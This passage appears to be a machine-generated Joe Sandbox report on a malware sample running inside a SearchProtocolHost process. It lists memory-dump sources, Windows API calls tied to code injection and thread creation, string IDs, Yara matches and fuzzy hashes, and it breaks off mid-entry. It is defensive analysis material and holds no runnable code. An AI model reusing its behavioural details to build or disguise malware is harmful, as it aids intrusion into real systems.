                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02A395F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(02A22088,?,02A3816F,00000000,00000004,00003000,?,?,?,?,?,02A3816F,02A22088,10458B0C,02A22088,00000000), ref: 02A398E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A396E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 40086aa0af5b2bef295cbce5dd2ce47e4a57a3ff1c862b44eb91c51bab8e8883
                                                                                  • Instruction ID: 368ef27aa820f2004321d0c903b4163b85eb161bb47c4750f7f9d2030b771f82
                                                                                  • Opcode Fuzzy Hash: 40086aa0af5b2bef295cbce5dd2ce47e4a57a3ff1c862b44eb91c51bab8e8883
                                                                                  • Instruction Fuzzy Hash: F8900231711404424140B16888449064005ABE1211755C121B5998550D86A98AA55A65

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 520 2a21098-2a210b0 521 2a210b9-2a2110e call 2a3c220 call 2a24820 call 2a113f0 call 2a31e20 520->521 522 2a210b4 call 2a3b810 520->522 531 2a21130-2a21135 521->531 532 2a21110-2a21121 PostThreadMessageW 521->532 522->521 532->531 533 2a21123-2a2112d 532->533 533->531
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 02A2111D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                  • API String ID: 1836367815-922563818
                                                                                  • Opcode ID: 48e7ce9b9e181d68542ed9ed000ddc066d33a657f703c3e008c8a651c3ee8e54
                                                                                  • Instruction ID: cecd12a76a4fe259f7f2041ea0b4c8f2d87615449163133122851222ac695399
                                                                                  • Opcode Fuzzy Hash: 48e7ce9b9e181d68542ed9ed000ddc066d33a657f703c3e008c8a651c3ee8e54
                                                                                  • Instruction Fuzzy Hash: A611C831D8025876DB21ABE49D42FEF7B799F41750F148054FA087B180DA7865068FE5

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 02A2111D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: sE716IK71M$sE716IK71M
                                                                                  • API String ID: 1836367815-922563818
                                                                                  • Opcode ID: f74383f6e5eaf82708ddbf861273db2c3e4f183863781a6df4847e7de21423d5
                                                                                  • Instruction ID: e9bb3e3206015f98be51e629d4db81c790796024e0de851a6764727f14c8e104
                                                                                  • Opcode Fuzzy Hash: f74383f6e5eaf82708ddbf861273db2c3e4f183863781a6df4847e7de21423d5
                                                                                  • Instruction Fuzzy Hash: 36019671D8125876EB21A7A49D41FDFBB7D9F41B50F048054FA087B180EBB866068FE5
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 02A33D1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: 4c67e6583f4598c795b7771d79a1ab1b59f241d7e994d112dab766ddb8d5c6ba
                                                                                  • Instruction ID: d4aee6131e9378645fcab72500eb7548c236d31c3afe293083db98de056c6a78
                                                                                  • Opcode Fuzzy Hash: 4c67e6583f4598c795b7771d79a1ab1b59f241d7e994d112dab766ddb8d5c6ba
                                                                                  • Instruction Fuzzy Hash: 9B319170A44705BBD714EFA4C880FEABBB9EB88710F00455DF61D9B240C7746640CBE1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                                                  • Instruction ID: 7d7d1fdbb53f4ff3caf1696c29824d49cfbdd0ea49c263ef1deab11c8f8bd4a4
                                                                                  • Opcode Fuzzy Hash: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                                                  • Instruction Fuzzy Hash: 06310175A00609DFDB10DFD8D8809EFB7BABF88304B108559E515EB214DB75EE458BA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                                                  • Instruction ID: 9cd8b4a65dcb7dd026e8e335224dda5732bd83579515dc086fb992b315c14e92
                                                                                  • Opcode Fuzzy Hash: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                                                  • Instruction Fuzzy Hash: 0031F0B5A0060ADFDB10DFD8D8809EFB7BAFF88304B108559E515EB214DB75EE458BA0
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A24892
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                                                  • Instruction ID: 295723f4c95cf5beae91e0cfeb97b3a2fff4f613b1081473039fbc12234541b2
                                                                                  • Opcode Fuzzy Hash: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                                                  • Instruction Fuzzy Hash: 9621217254864A9BC7019FFCD841BE4BBB4DF09224F104794DC68AB6E1EF305909C782
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A24892
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                  • Instruction ID: b0f6242b2763bb44a7597d8263d5ffc39c2251dd063ca1b464adce3eaf12079b
                                                                                  • Opcode Fuzzy Hash: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                  • Instruction Fuzzy Hash: C601D8B5E50149ABDF11DBE4DC41FDDB7759F44318F0042A9E9189B281FA31E708CB91
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A24892
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                  • Instruction ID: 6183e798b32f91ed254ee76272213e8e93cb5a9f2f4c1afcff56e13b656cc507
                                                                                  • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                  • Instruction Fuzzy Hash: FC0121B5D4024DABDF10DBE4DD81FDEB7B99B44308F004595E908A7241FA31E758CB91
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A285DE,00000010,?,?,?,00000044,?,00000010,02A285DE,?,?,?), ref: 02A39B23
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                                                  • Instruction ID: 570cf662ba192016592d512a13d4cb25b9fb5eaa17e5bbeec5b8b8af7279fd5d
                                                                                  • Opcode Fuzzy Hash: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                                                  • Instruction Fuzzy Hash: 5601D2B2210108BBCB04DF99DC80EDB77ADEF8C754F018208FA49E7240D630F8518BA4
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A19E81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: 897b5008a066ca781a9f9edfdb1018c822e6dcf4366a4ba6e097ef57d074295b
                                                                                  • Instruction ID: 406124d044f49c8bcbb2ce5519b7029805075a0cae2f02aabace2512d30b1517
                                                                                  • Opcode Fuzzy Hash: 897b5008a066ca781a9f9edfdb1018c822e6dcf4366a4ba6e097ef57d074295b
                                                                                  • Instruction Fuzzy Hash: C2F0397228061436E72176ADAD02F9BA68ECB81BB1F240066FA0CEA1C0D996B4414AA5
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A19E81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: 9e635f60936242cedb424141fa78a542287fe07c6d5069c1c1935485f0b75a4b
                                                                                  • Instruction ID: 7c2f976fa4847a68181576ba99750f17fca045f7e46df56c3439258a32c61391
                                                                                  • Opcode Fuzzy Hash: 9e635f60936242cedb424141fa78a542287fe07c6d5069c1c1935485f0b75a4b
                                                                                  • Instruction Fuzzy Hash: 26E0927228060032E76176989D02FDB679E8FC4761F250046FA08AB1C0DDA5B4414EA5
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,7CB0E851,00000007,00000000,00000004,00000000,02A240A6,000000F4), ref: 02A39A6F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                  • Instruction ID: 8ab32016936ae5c91f83fca365308008d746653f8d7856271533e1f9aed183ef
                                                                                  • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                  • Instruction Fuzzy Hash: 8EE065B22002587BCB10EE99DC41FEB37ADEFC9714F004419FA09A7241CA70B9108AB5
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(02A21D39,?,02A35AD7,02A21D39,02A3582F,02A35AD7,?,02A21D39,02A3582F,00001000,?,?,00000000), ref: 02A39A1F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                  • Instruction ID: 9a2e5571943876892bfd88b3921761afe1bfd7f0951b8120788a9380799696b3
                                                                                  • Opcode Fuzzy Hash: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                  • Instruction Fuzzy Hash: B3E065B22403157BDB10EE99DC41FAB37ADEF89B64F004408FA49A7241DB70B9108BB5
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A28648
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 855b8d50a8016bda6a6a97f31ff92b957c90bbdca47c53022890a0e2a56f69ba
                                                                                  • Instruction ID: dc39345fea59a18dd7ddf87d87fe162ba916f4c4063bb18ce819e148063072b4
                                                                                  • Opcode Fuzzy Hash: 855b8d50a8016bda6a6a97f31ff92b957c90bbdca47c53022890a0e2a56f69ba
                                                                                  • Instruction Fuzzy Hash: 51E086712802046FEB1467ACDC81B663399CF48769F144A50F82CDB2C1DA7EF5164560
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A28648
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: f738cbb425e611d8e9e269ad94cf466be0197022c3636d257a479034ed59d302
                                                                                  • Instruction ID: e654f362ef425bc7adcd97dc9fd67f75877831ad06800bca081d1f1c805b3a06
                                                                                  • Opcode Fuzzy Hash: f738cbb425e611d8e9e269ad94cf466be0197022c3636d257a479034ed59d302
                                                                                  • Instruction Fuzzy Hash: 25E0DF302402046BEB286B68CC81B6533588F49325F144A50F96C8B2C2DF7EE52A46A0
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02A22030,02A3816F,02A3582F,02A21FF6), ref: 02A2843F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 119c9e1f68007de04e482f7eb05232315956690a884a29b287f5bc2f0f46cb40
                                                                                  • Instruction ID: 1ff2ab8b9ea9095f70ab508794916f1f908b5e7d5fec6aaf0b5a402a3ef522c4
                                                                                  • Opcode Fuzzy Hash: 119c9e1f68007de04e482f7eb05232315956690a884a29b287f5bc2f0f46cb40
                                                                                  • Instruction Fuzzy Hash: A5E0C2306C02423BF741FBA48E81B197B8A9B10B45F14008CB94CEA2C6CE59E1148A61
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,02A22030,02A3816F,02A3582F,02A21FF6), ref: 02A2843F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: bfd20958474ed37cd433a6109d1ad55ec62e432b419dd531c5f2b1d0db490eae
                                                                                  • Instruction ID: 633715a2acdf1eb793f0574a413e8873925173bc73d78661d35b8450064f77ce
                                                                                  • Opcode Fuzzy Hash: bfd20958474ed37cd433a6109d1ad55ec62e432b419dd531c5f2b1d0db490eae
                                                                                  • Instruction Fuzzy Hash: 86D05E716C02053BFA50B6A89C82F16328E9B54B91F104054BA0CEA2C0DD59F00049A6
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A24892
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
